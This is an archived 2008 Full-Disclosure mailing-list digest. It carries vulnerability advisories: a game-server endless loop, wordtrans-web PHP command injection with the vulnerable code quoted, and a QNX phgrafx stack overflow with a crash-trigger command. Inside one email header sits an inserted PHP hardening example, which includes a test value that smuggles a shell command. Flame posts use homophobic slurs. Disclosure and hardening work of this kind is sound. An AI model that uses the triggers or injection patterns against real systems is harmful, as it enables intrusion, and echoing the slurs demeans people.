From jlay at slave-tothe-box.net Tue Jul 1 00:22:21 2008
From: jlay at slave-tothe-box.net (James Lay)
Date: Mon, 30 Jun 2008 17:22:21 -0600
Subject: [Full-disclosure] Recent SSH Scan IP's
Message-ID:

For those that care...it's just a list of the recent SSH scan storm that's
been happening the last couple days..pulled fresh from the log files today.
Enjoy if it's useful to you, pretend this never happened if not.

James

From aluigi at autistici.org Tue Jul 1 01:52:44 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Tue, 1 Jul 2008 01:52:44 +0100
Subject: [Full-disclosure] Endless loop in Soldner 33724
Message-ID: <20080701015244.3dbd600e.aluigi@autistici.org>


#######################################################################

                             Luigi Auriemma

Application:  SÖLDNER - Secret Wars
              http://www.secretwars.net
              http://soldner.jowood.com
Versions:     <= 33724
Platforms:    Windows
Bug:          endless loop
Exploitation: remote, versus server
Date:         01 Jul 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


SÖLDNER is a tactical military game developed by Wings Simulations and
released in May 2004.


#######################################################################

======
2) Bug
======


Each UDP packet for this game can contain various blocks of data.
The type 0x80 forces the server to perform a cycle from zero to the
32 bit number (so max 0xffffffff) specified in that data block.

The maximum size of a packet supported by the game is 1400 bytes in
which it is possible to place max 233 blocks of this type causing the
freeze of a server for over 2 hours (tested with a fast CPU).


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/usurdat.zip


#######################################################################

======
4) Fix
======


No fix


#######################################################################


---
Luigi Auriemma
http://aluigi.org

From ivanhec at gmail.com Tue Jul 1 02:51:49 2008
From: ivanhec at gmail.com (Ivan .)
Date: Tue, 1 Jul 2008 11:51:49 +1000
Subject: [Full-disclosure] I've Seen the Future, and It Has a Kill Switch
Message-ID: <6450e99d0806301851k5e328660l3b4f4fb46e67ec8f@mail.gmail.com>

http://www.wired.com/politics/security/commentary/securitymatters/2008/06/securitymatters_0626

From ureleet at gmail.com Tue Jul 1 04:52:35 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 30 Jun 2008 23:52:35 -0400
Subject: [Full-disclosure] Save Gary Mckinnon
In-Reply-To: <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9@mail.gmail.com>
References: <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9@mail.gmail.com>
Message-ID: <6158bb410806302052x14999105t56e281ce6cc4cf8b@mail.gmail.com>

apparently you have no idea what gary mckinnon did. you need to read
some more articles.

On Sun, Jun 29, 2008 at 10:04 PM, n3td3v wrote:
> Gary Mckinnon is going to be locked away for 64 years for doing a default
> password scan of the U.S military.
>
> We need to save this guys life, yes he was stupid, yes he was dumb, yes he
> shouldn't have done it.
>
> He is a weirdo who tried to find out about UFO research within military
> ranks, should we send Gary Mckinnon away the same as a suicide bomber
> terrorist?
>
> The U.S military are going to make an example of this man, an example that
> is unjust, we need to save Gary, save Gary... save Gary!
>
> All the best,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From Everhart at gce.com Tue Jul 1 03:58:53 2008
From: Everhart at gce.com (Mary and Glenn Everhart)
Date: Mon, 30 Jun 2008 22:58:53 -0400
Subject: [Full-disclosure] "what have you released..."
In-Reply-To:
References:
Message-ID: <48699D6D.2020304@gce.com>

full-disclosure-request at lists.grok.org.uk wrote:
> Today's Topics:
>
>    1. Fwd: what problem are we solving? (was Re: ICANN opens up
>       Pandora'sBox of (n3td3v)
>    2. Re: Gadi Evron is a troll (Th3 M0ths)
>    3. Save Gary Mckinnon (n3td3v)
>    4. Re: Let's make a spy-proof communications infrastructure
>       (Jubei Trippataka)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sun, 29 Jun 2008 23:49:08 +0100
> From: n3td3v
> Subject: [Full-disclosure] Fwd: what problem are we solving? (was Re:
>       ICANN opens up Pandora'sBox of
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>       <4b6ee9310806291549w40aefeebqde4c3b5ace15895d at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Classic Gadi Evron Gayness! He's currently trolling the I.S.P community via
> NANOG mailing list.
>
> "Because the Internet is not governemned, common misbelief aside. It's a
> mess of capitalism and anarchism. In fact, The Internet is the only
> functioning anarchu."
>
> Hilarious TROLLING effort by Gadi, keep up the good work.
>
> All the best,
>
> n3td3v
>
> ---------- Forwarded message ----------
> From: Gadi Evron
> Date: Sun, Jun 29, 2008 at 9:42 PM
> Subject: Re: what problem are we solving? (was Re: ICANN opens up
> Pandora'sBox of
> To: Jim Popovitch
> Cc: nanog at nanog.org
>
>
> On Sun, 29 Jun 2008, Jim Popovitch wrote:
>
>
>> On Sun, Jun 29, 2008 at 1:21 PM, Peter Beckman
>> wrote:
>>
>>
>>> Let the search engines organize the web, not DNS.
>>>
>>>
>> OK, (assuming you believe that), why keep dns around. Why not go back
>> to just IP addrs and hosts files for those that need them.
>>
>>
>
> Because the Internet is not governemned, common misbelief aside. It's a mess
> of capitalism and anarchism. In fact, The Internet is the only functioning
> anarchu.
>
> I see no reason why search engines won't, they already do, whether we want
> to admit it or not, for the home user they ARE the Internet.
>
> Gadi.
>
> -Jim P.
>
>>
>
> ------------------------------
>
> Message: 2
> Date: Sun, 29 Jun 2008 19:30:54 -0400
> From: "Th3 M0ths"
> Subject: Re: [Full-disclosure] Gadi Evron is a troll
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>       <1204677e0806291630j7b1045f0tff319c05dfa1f286 at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Homosapien? I'm pretty sure he is a human.
>
> On Sun, Jun 29, 2008 at 2:39 PM, n3td3v wrote:
>
>> On Sun, Jun 29, 2008 at 7:29 PM, Ureleet wrote:
>>
>>> dont start, you were just getting good!
>>>
>> What do you mean getting good, i've been good the whole time homo!
>>
>> All the best,
>>
>> n3td3v
>>
>>
>>> 2008/6/29 n3td3v :
>>>
>>>> Gadi Evron is a troll
>>>>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 30 Jun 2008 03:04:42 +0100
> From: n3td3v
> Subject: [Full-disclosure] Save Gary Mckinnon
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>       <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9 at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Gary Mckinnon is going to be locked away for 64 years for doing a default
> password scan of the U.S military.
>
> We need to save this guys life, yes he was stupid, yes he was dumb, yes he
> shouldn't have done it.
>
> He is a weirdo who tried to find out about UFO research within military
> ranks, should we send Gary Mckinnon away the same as a suicide bomber
> terrorist?
>
> The U.S military are going to make an example of this man, an example that
> is unjust, we need to save Gary, save Gary... save Gary!
>
> All the best,
>
> n3td3v
>
> ------------------------------
>
> Message: 4
> Date: Mon, 30 Jun 2008 13:35:08 +1000
> From: "Jubei Trippataka"
> Subject: Re: [Full-disclosure] Let's make a spy-proof communications
>       infrastructure
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>       <1c27cb9a0806292035s2aac3c27k73d68decd87d7d90 at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
>
>> Yes as i've been saying already the intelligence services for years like
>> MI5, MI6 have been laughing at Full-Disclosure for years about us and the
>> media getting excited about internet explorer, fire fox, opera, safari drama
>> and the other likes.
>>
>> While that may be stimulating for some, it hasn't chipped a single inch out
>> of the government and the intelligence services.
>>
>> The biggest government hack of all time? Some faggot weirdo called Gary
>> Mckinnon probing the Pentagon and other government networks with a text file
>> of manufacturer default passwords, and he is about to be extradited to the
>> U.S.A for it and be put in jail for 65 years, lmao!!!
>>
>> The government are laughing their asses off at how softcore the world elite
>> hackers are, we need to crank up a gear and give the government something to
>> think about.
>>
>> I'm not talking about anything illegal or breaking the law, i'm talking
>> about lawful critical vulnerability discosure on the mailing lists thats
>> going to make the intelligence services and the government wake up and bring
>> real credibility to the mailing list.
>>
>> Right now, folks releasing quicktime flaws and other gay shit, thats so
>> 1999, its time to research and disclose stuff thats going to get you stopped
>> at passport control and have your vulnerability research taken off you for
>> analysis when you plan to do a speech at a security conference etc.
>>
>> Like say, we need to move away from gay shit, and think about the
>> government and the intelligence services, they are currently walking all
>> over all of us, its time to get even technically.
>>
>> All the best,
>>
>> n3td3v
>>
>>
>>
> Put your money where your mouth is. What have you released that will make
> the government respect this list?
>
> Secondly, what does FD and the "world of elite hackers" have in common?
> Nothing.
>

I might ask the same question of others. I have released encrypting
virtual disks and a distributed multilevel secure kernel (back in 1979)
with sources published back then. I have released code for extended
authorization controls with a half decent initial approach to controlling
mobile code, back in the 1990s again with source code. I have described a
few generic defenses against injection attacks and buffer overflows.

No matter; this is pointless. Reciting lists of old software (or hardware)
is IMO only useful where contemporary problems might be addressed by that
software or its methods (or perhaps when some Johnny come lately tries to
patent ideas published decades before).

However the personal attacks are childish and of no interest to me (or, I
suspect, to very many others) and distract from the technical question
which in this case I tried to pose and which I meant for serious
consideration.

It is easy to offer opinions about some political issue. It is not so easy
to offer designs. Yet designs for a communication system that will vitiate
surveillance and frustrate control freaks may be a great value to all.
Publishing THAT kind of article will impress, and deserve honor and praise.
If you must think of such as a form of hacking, think of it as hacking
whole government agencies all at once, or hacking scores of fraudsters,
again all at once.

But can we have technical commentary? Or is this the wrong group?

thanks
Glenn Everhart

From tonnerre.lombard at sygroup.ch Tue Jul 1 07:34:52 2008
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Tue, 1 Jul 2008 08:34:52 +0200
Subject: [Full-disclosure] so this is FD...
In-Reply-To:
References:
Message-ID: <20080701083452.07c0952d@wssyg117.sygroup-int.ch>

Salut, Lucio Crusca,

On Fri, 27 Jun 2008 08:46:19 +0000, Lucio Crusca wrote:
> I've been reading bugtraq in several short periods of my life, from

Please note that the idea behind full-disclosure and bugtraq is quite a
bit different, so you cannot really compare the two. Basically it boils
down to: on bugtraq, someone is filtering for you while on f-d, you are
responsible to do it yourself.

> after a few months of FD reading, I feel bored again. I've never
> replied to any of the trolls and trolls-feeders on this list, but
> I've always been hardly hoping it was a transient situation, not the
> main (and sometimes only) topic of the list. Hell, if you filter out

You should consider the constant trolling as "line noise". I have found
that an IMAP folder specific bayesian SPAM filter serves quite well to
filter out the discussions on this list not worth reading. But of
course then you're basically down to advisories and occasional
interesting discussions taking place every other month.

However, with the appropriate amount of recipient-side filtering,
full-disclosure is actually quite readable. Like Wau Holland used to
say, the world usually gets better when you learn to adjust your
filters.

                                Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33            Güterstrasse 86
Fax:+41 61 383 14 67            4053 Basel
Web:www.sygroup.ch              tonnerre.lombard at sygroup.ch

From staff at lul-disclosure.net Tue Jul 1 02:57:29 2008
From: staff at lul-disclosure.net (staff)
Date: Mon, 30 Jun 2008 21:57:29 -0400
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
Message-ID:

Are you ready for a site that isn't full of fagottry?
Where Gadi can't steal your money or eat your lunches?
Where you can freely submit lulz to be published?
Where Theo's defeat and denial are brought to light?

Wait no more!

http://lul-disclosure.net/

WhiteHat? BlackHat? We are lulzhat. Fuck you and your hats.

From lists at foo.io Tue Jul 1 09:32:34 2008
From: lists at foo.io (fukami)
Date: Tue, 1 Jul 2008 10:32:34 +0200
Subject: [Full-disclosure] CFP 25C3 - The 25th Chaos Communication Congress 2008
Message-ID: <07843905-9035-4C9E-B0C5-36AE1822EDB9@foo.io>

The 25th Chaos Communication Congress (25C3)
============================================

is the annual four-day conference organized by the Chaos Computer Club
(CCC) in Berlin, Germany. First held in 1984, it since has established
itself as "The European Hacker Conference", attracting a diverse
audience of thousands of hackers, scientists, artists, and utopists
from all around the world.

We want you to join and be a part of this unique event which serves as
a public platform for cross-culture inspiration and borderless
networking. 25C3 is fun!

Topics
======

The 25C3 conference program is roughly divided into six general
categories. These categories serve as guidelines for your submissions
(and later as a means of orientation for your prospective audience).
However, it is not mandatory for your talk to exactly match the
descriptions below. Anything that is interesting and/or funny will be
taken into consideration.

Hacking
-------

The "Hacking" category addresses topics dealing with technology,
concentrating on current research with high technical merit.
Traditionally, the majority of all lectures at 25C3 revolve around
hacking. Topics in this domain include but are in no way limited to:
programming, hardware hacking, cryptography, network and system
security, security exploits, and creative use of technology.

Making
------

The "Making" category is all about making and breaking things and the
wonderful stuff you can build in your basement or garage. Most welcome
are submissions dealing with the latest in electronics, 3D-fabbing,
climate-change survival technology, robots and drones, steam machines,
alternative transportation tools and guerilla-style knitting.

Science
-------

The "Science" category covers current or future objects of scientific
research that have the potential to radically change our lives, be it
basic research or projects conducted for the industry. We are looking
for talks and papers on the state of the art in this domain, covering
subjects such as nano technology, quantum computing, high frequency
physics, bio-technology, brain-computer interfaces, automated analysis
of surveillance cctv, etc.

Society
-------

Technology development causes great changes in society and will
determine our future. This category is for all talks on subjects like
hacker tools and the law, surveillance practices, censorship,
intellectual property and copyright issues, data retention, software
patents, effects of technology on kids, and the impact of technology
on society in general.

Culture
-------

Shaping the world we live in means making it more interesting,
entertaining and beautiful. The hacker culture has many facets ranging
from electronic art objects, stand-up comedy, geek entertainment, video
game and board game culture, music, 3D art to e-text literature and
beyond. If you like to show your art and teach others how to make their
lives more enjoyable, this category is for you.

Community
---------

In addition to individual speakers the Chaos Communication Congress is
also inviting groups such as developer teams, projects and activists to
present themselves and their topics. Developer groups are also
encouraged to ask for support to hold smaller on-site developer
conferences and meetings in the course of the Congress.

Further Information
===================

The Chaos Communication Congress is a non-profit oriented event and
speakers are not paid. However, financial help on travel expenses and
accommodation is possible. It needs to be agreed upon after acceptance
of the submission, though. Don't be shy and state your requirements in
the application when submitting your lecture and we'll work something
out!

You can find the preliminary agenda and additional information on our
25C3 website at http://events.ccc.de/congress/2008/. For further
information and questions please feel free to contact
25c3-content at cccv.de

Submissions
===========

All proposals must be submitted online using our online lecture
submission system at https://cccv.pentabarf.org/submission/25C3.

Please follow the instructions given there. If you have any questions
regarding your submission, feel free to contact us at
25c3-content at cccv.de but do NOT submit your lecture via e-mail.

Language
========

25C3 is an international event and we want to have a lot of interesting
talks in English for the benefit of our growing number of international
guests. So ideally we are looking for speakers who can give lectures
and/or workshops in either English or German.

But while we are interested in maximizing the quality of presentations,
the topic and its relevance to our community are our main concern. So
don't worry about your English skills: the language of a submission is
not a criteria for accepting or rejecting it!

If you feel insecure talking in English, have received criticism on
your language skills from your audience before, or if you just fear
that the value and understandability of your lecture might suffer,
please offer your talk in German. Please tell us if you are a native
speaker of English or have similar skills, when submitting your
lecture.

Papers
======

Accepted speakers can optionally hand in a paper which will be
published with an ISBN in the 25C3 Proceedings. Papers will be accepted
in Portable Document Format (PDF) only and should be around 5 pages.
The PDF file must not be password-protected or contain other
restrictions. Paper size should be DIN A4 in portrait orientation. All
margins must be set to at least 2 cm (0.78 inches). Pictures should be
greyscale and up to 300dpi. Apart from that, you are free to use any
layout you want.

Slides
======

Accepted speakers are asked to hand in slides used in their talks.
Please use a well-known format for your slides.

Publication
===========

Audio and video recordings of the lectures will be published online in
various formats. The Chaos Communication Congress Proceedings are
published on paper and online. Only reviewed and accepted talks and
presentations will be published. All material will be available under
the Creative Commons Attribution-NonCommercial-NoDerivs 2.0 Germany
(BY-NC-ND) license allowing free non-commercial redistribution of the
material as long as the original credit to authors and publishers is
retained.

Licence URI: http://creativecommons.org/licenses/by-nc-nd/2.0/de/

We encourage contributors to publish their work under a more liberal
license; if you wish to do so, please state this with your submission.

Dates and Deadlines
===================

The deadline for submission is October 5th, 2008 Midnight (23:59) UTC.
Notification of acceptance will be sent by e-mail on November 7th, 2008
the latest. However, you may very well get your notification earlier
than that if needed. Final papers or slides are due by November 18th,
2008.

- October 5th, 2008 (Midnight UTC)
  Submission due
- November 7th, 2008 (Midnight UTC)
  Final notification of acceptance (or earlier)
- November 28th, 2008 (Midnight UTC)
  Final papers due
- December 27th - 30th, 2008
  Chaos Communication Congress

Lecture Requirements
====================

Lectures should not exceed 45 minutes plus up to 10 minutes for
questions and answers. Longer time slots are possible if we feel the
topic demands it (please tell us if necessary). Workshops should
include a talk on the basic principles in the lecture program and a
practical hands-on session in the workshop room.

Criteria which must be met to consider a lecture
================================================

- submission is in time
- for the event all fields in the general and the description tab are
  filled out
- for the person all fields in the description tab are filled out

Criteria by which we assess a lecture
=====================================

- we consider the topic in general relevant for the participants
- we consider the topic currently relevant for the participants
- we consider the topic interesting, fun and worthy to be known more
  about
- the lecture is about something the speaker made himself
- we think the lecture might be fun
- the lecture is part of a workshop (has a second part which is a
  workshop)
- the lecture presents something new
- the more information provided about the lecture and the speaker the
  better

Criteria by which we NOT assess a lecture
=========================================

- the language
- need for financial help on travel expenses

From research at scanit.net Tue Jul 1 05:25:17 2008
From: research at scanit.net (Scanit Labs)
Date: Tue, 01 Jul 2008 08:25:17 +0400
Subject: [Full-disclosure] [SCANIT-2008-002] Wordtrans-web Remote Command Execution Vulnerability
Message-ID: <1214886317.18366.14.camel@realvirtuality>

Wordtrans-web Remote Command Execution Vulnerability

Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename: SCANIT-2008-002.txt
SCANIT ID: SCANIT-2008-002
Published: June 30th, 2008


I. Summary

Wordtrans is a free front-end graphical application that allows you to
look for words in several dictionaries. It can also translate the word
that the user selects with his mouse.

The latest Wordtrans version could allow a remote attacker to execute
arbitrary code in the server, caused by an input validation error in the
wordtrans-web package, which is a PHP-based Web interface for Wordtrans.


II. Affected Products

This vulnerability affects the wordtrans 1.1pre15 and probably previous
versions.


III. Details

By sending a GET request with the variable "command" set to 'show_desc',
the variable "link_options" receives one argument from the user, passed
via the "advanced" variable using the GET method. Then, the variable
"link_options" is concatenated with the variable "exec_wordtrans".

Since "exec_wordtrans" is passed to the function "passthru" without
checking for special characters, an attacker can send shell characters
like | or ; to execute commands in the machine with the privileges of the
Web server process at the time the URL is submitted.

This is part of vulnerable script from wordtrans 1.1pre15:

    ...
    $exec_wordtrans = $wordtrans . "-d \"$dict\" ";

    switch ($_GET['command']) {
        case "show_desc":
            $exec_wordtrans .= "--desc ";
            $link_options = "--html-link-options \"?lang= $lang_case&advanced=".$_GET['advanced']."&\" ";
            $exec_wordtrans .= $link_options;
            passthru($exec_wordtrans);
            break;
    ...

To exploit this vulnerability, the "Magic Quotes" option needs to be
unset.
But since this option was removed from PHP since version 6.0.0, this is a
critical vulnerability.


IV. Solution

No vendor response.


V. Timeline

March 1st, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release


VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe Balestra
and Rodrigo Rubira Branco (BSDaemon).


VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research
activities. By keeping track of the newest defensive and offensive
technologies, Scanit's researchers are able to contribute with
unpublished works made in-house. This way, by driving the
state-of-the-art in computer security, Scanit honors its commitment to
stay in the front line of scientific evolution.

Reach us at research at scanit.net
Visit http://www.scanit.net


VIII. Disclaimer

The information contained in this document may change without notice. Use
of this information constitutes acceptance for use in an "AS IS"
condition. There are no warranties regarding the topicality, correctness,
completeness or quality of the information provided by this document.
Under no circumstances shall the authors be held liable for any direct,
indirect, or consequential damages, losses, injuries, or unlawful
offences allegedly arising from the use of this information.

Copyright 2008 Scanit Middle East FZ/LLC

From research at scanit.net Tue Jul 1 05:25:21 2008
From: research at scanit.net (Scanit Labs)
Date: Tue, 01 Jul 2008 08:25:21 +0400
Subject: [Full-disclosure] [SCANIT-2008-003] Wordtrans-web Remote Command Execution Vulnerability
Message-ID: <1214886321.18366.15.camel@realvirtuality>

Wordtrans-web Remote Command Execution Vulnerability

Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename: SCANIT-2008-003.txt
SCANIT ID: SCANIT-2008-003
Published: June 30th, 2008


I. Summary

Wordtrans is a free front-end graphical application that allows you to
look for words in several dictionaries. It can also translate the word
that the user selects with his mouse.

The latest Wordtrans version could allow a remote attacker to execute
arbitrary code in the server, caused by an input validation error in the
wordtrans-web package, which is a PHP-based Web interface for Wordtrans.


II. Affected Products

This vulnerability affects the wordtrans 1.1pre15 and probably previous
versions.


III. Details

When sending a request without the variable "command" or with an
undefined command and any word in the variable "word", the variable
"link_options" receives one argument from the user, passed with the
"advanced" variable using the POST method. Then, the variable
"link_options" is concatenated with the variable "exec_wordtrans".

Since "exec_wordtrans" is passed to the function "passthru" without
checking for special characters, we can send shell characters like | or ;
to execute commands in the machine with privileges of the Web server
process when the URL is submitted.

This is part of vulnerable script from wordtrans 1.1pre15:

    ...
    $exec_wordtrans = $wordtrans . "-d \"$dict\" ";

    switch ($_GET['command']) {
    ...
        default:
            if ($_POST['word'] != "") {
                if ($_POST['fullwords'])
                    $exec_wordtrans .= " +w ";
                else
                    $exec_wordtrans .= " -w ";
                if ($_POST['casesensitive'])
                    $exec_wordtrans .= " +c ";
                else
                    $exec_wordtrans .= " -c ";
                if ($_POST['invertir'])
                    $exec_wordtrans .= " +i ";
                else
                    $exec_wordtrans .= " -i ";
                if ($_POST['noacentos'])
                    $exec_wordtrans .= " +g ";
                else
                    $exec_wordtrans .= " -g ";
                $link_options = "--html-link-options \"?lang= $lang_case&advanced=".$_POST['advanced']."&\" ";
                $exec_wordtrans .= $link_options;
                $exec_wordtrans .= "\"".$_POST['word']."\"";
                passthru($exec_wordtrans);
    ...

To exploit this vulnerability, the "Magic Quotes" option needs to be
unset. But since this option was removed from PHP since version 6.0.0,
this is a critical vulnerability.


IV. Solution

No vendor response.


V. Timeline

March 10th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release


VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe Balestra
and Rodrigo Rubira Branco (BSDaemon).


VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research
activities. By keeping track of the newest defensive and offensive
technologies, Scanit's researchers are able to contribute with
unpublished works made in-house. This way, by driving the
state-of-the-art in computer security, Scanit honors its commitment to
stay in the front line of scientific evolution.

Reach us at research at scanit.net
Visit http://www.scanit.net


VIII. Disclaimer

The information contained in this document may change without notice. Use
of this information constitutes acceptance for use in an "AS IS"
condition. There are no warranties regarding the topicality, correctness,
completeness or quality of the information provided by this document.
Under no circumstances shall the authors be held liable for any direct,
indirect, or consequential damages, losses, injuries, or unlawful
offences allegedly arising from the use of this information.

Copyright 2008 Scanit Middle East FZ/LLC From research at scanit.net Tue Jul 1 05:25:12 2008 
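The command construction described in SCANIT-2008-003 above, shown beside a hardened form. This is an added example, not wordtrans-web source and not part of the advisory; the function names, the binary path, the dictionary name, the 0/1 reading of "advanced", the $lang pattern and the 64-byte limit are assumptions made for illustration.

```php
<?php
// Added example, not wordtrans-web source. Function names, the 0/1 form of
// "advanced", the $lang pattern and the 64-byte limit are assumptions.

// The pattern the advisory quotes: request values are pasted between literal
// double quotes, and the finished string is handed to passthru(), i.e. a shell.
function build_vulnerable(string $bin, string $dict, string $lang, array $post): string
{
    $cmd  = $bin . " -d \"$dict\" ";
    $cmd .= !empty($post['fullwords']) ? " +w " : " -w ";
    $cmd .= "--html-link-options \"?lang=$lang&advanced=" . ($post['advanced'] ?? '') . "&\" ";
    $cmd .= "\"" . ($post['word'] ?? '') . "\"";
    return $cmd;
}

// Hardened form: validate each value against what the field is for, then quote
// every argument with escapeshellarg() so the shell sees one literal word each.
function build_hardened(string $bin, string $dict, string $lang, array $post): ?string
{
    $word = $post['word'] ?? '';
    if (!is_string($word)                          // word[]=x arrives as an array
        || $word === '' || strlen($word) > 64
        || preg_match('/[\x00-\x1f\x7f]/', $word)  // NUL, newlines, other controls
        || preg_match('/^[-+]/', $word)) {         // would be read as an option
        return null;
    }
    if (!preg_match('/^[A-Za-z_]{1,16}$/', $lang)) {
        return null;
    }
    // Treated here as an on/off flag, so it is mapped onto an allow-list and
    // the submitted bytes never reach the command line.
    $advanced = (($post['advanced'] ?? '') === '1') ? '1' : '0';

    $args  = ['-d', $dict];
    $flags = ['fullwords' => 'w', 'casesensitive' => 'c', 'invertir' => 'i', 'noacentos' => 'g'];
    foreach ($flags as $field => $letter) {
        $args[] = (!empty($post[$field]) ? '+' : '-') . $letter;
    }
    $args[] = '--html-link-options';
    $args[] = "?lang=$lang&advanced=$advanced&";
    $args[] = $word;

    // Depending on LC_CTYPE, escapeshellarg() can drop non-ASCII bytes; set a
    // UTF-8 locale with setlocale() first if accented words must survive.
    return escapeshellarg($bin) . ' ' . implode(' ', array_map('escapeshellarg', $args));
}

// Constructed requests, for illustration only. Nothing is executed; the two
// command strings are printed so the difference in quoting is visible.
$samples = [
    'plain word'             => ['word' => 'casa', 'advanced' => '1'],
    'quote in advanced'      => ['word' => 'casa', 'advanced' => '1" ; echo INJECTED ; "'],
    'metacharacters in word' => ['word' => "it's `x` | y", 'fullwords' => 'on'],
    'option-like word'       => ['word' => '--html-link-options'],
];
foreach ($samples as $label => $post) {
    echo "== $label\n";
    echo "vulnerable: ", build_vulnerable('/usr/bin/wordtrans', 'es-en', 'es', $post), "\n";
    $safe = build_hardened('/usr/bin/wordtrans', 'es-en', 'es', $post);
    echo "hardened:   ", $safe ?? '(request rejected)', "\n";
}
```

On PHP 7.4 and later, passing the argument list as an array to proc_open() avoids the shell altogether, which removes the need for quoting.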
From: research at scanit.net (Scanit Labs)
Date: Tue, 01 Jul 2008 08:25:12 +0400
Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
Message-ID: <1214886312.18366.13.camel@realvirtuality>

QNX phgrafx Privilege Escalation Vulnerability

Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename: SCANIT-2008-001.txt
SCANIT ID: SCANIT-2008-001
Published: June 30th, 2008

I. Summary

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems.

From QNX's website: "Companies worldwide like Cisco, Delphi, Siemens,
Alcatel and Texaco depend on the QNX technology for network routers,
medical devices, intelligent transportation systems, safety and security
systems, next-generation robotics, and other mission-critical
applications. In addition, QNX forms the core for Ford Motor Co.'s
Lincoln Aviator IAV, an engineering concept vehicle. The new system
supports the development of next-generation in-car communications,
infotainment, and telematics applications."

More information is available at http://www.qnx.com/products/rtos/.

Local exploration of a buffer overflow vulnerability inside
/usr/photon/bin/phgrafx included by default in QNX RTOS latest version
(6.3.2) could allow an attacker to gain root privileges.

II. Affected Products

Scanit has confirmed the existence of this vulnerability in QNX RTOS
6.3.2 and QNX RTOS 6.3.0. Probably previous versions are vulnerable too.

III. Details

The vulnerability itself exists due to improper handling of the
PHOTON_PATH/palette/*.pal file. When a filename greater than 285
characters is created with the extension .pal in the directory
"palette", a stack-based overflow occurs, allowing the attacker to
control program flow.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#

IV. Solution

According to the vendor's response:

"QNX Software Systems confirms this vulnerability in Momentics 6.3.2 and
earlier versions. The phgrafx binary is to be deprecated in future
releases. For the time being, it is recommended that the user clear the
set user ID bit from the file permissions. If this is done, only the
root user may change the graphics configuration."

V. Timeline

February 20th, 2008 - Vulnerability discovery
March 24th, 2008    - First contact attempt
March 27th, 2008    - Vendor response
June 30th, 2008     - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe Balestra
and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research
activities. By keeping track of the newest defensive and offensive
technologies, Scanit's researchers are able to contribute with
unpublished works made in-house. This way, by driving the
state-of-the-art in computer security, Scanit honors its commitment to
stay in the front line of scientific evolution.

Reach us at research at scanit.net
Visit http://www.scanit.net

VIII. Disclaimer

The information contained in this document may change without notice.
Use of this information constitutes acceptance for use in an "AS IS"
condition. There are no warranties regarding the topicality,
correctness, completeness or quality of the information provided by this
document. Under no circumstances shall the authors be held liable for
any direct, indirect, or consequential damages, losses, injuries, or
unlawful offences allegedly arising from the use of this information.

Copyright 2008 Scanit Middle East FZ/LLC

From keytoaster at gentoo.org Tue Jul 1 12:51:43 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Tue, 01 Jul 2008 13:51:43 +0200
Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer overflows
Message-ID: <486A1A4F.1080404@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200807-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Python: Multiple integer overflows
      Date: July 01, 2008
      Bugs: #216673, #217221
        ID: 200807-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows may allow for Denial of Service.

Background
==========

Python is an interpreted, interactive, object-oriented programming
language.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  dev-lang/python      < 2.4.4-r13                     *>= 2.3.6-r6
                                                          >= 2.4.4-r13

Description
===========

Multiple vulnerabilities were discovered in Python:

* David Remahl reported multiple integer overflows in the file
  imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).
  This issue is due to an incomplete fix for CVE-2007-4965.

* Justin Ferguson discovered that an integer signedness error in the
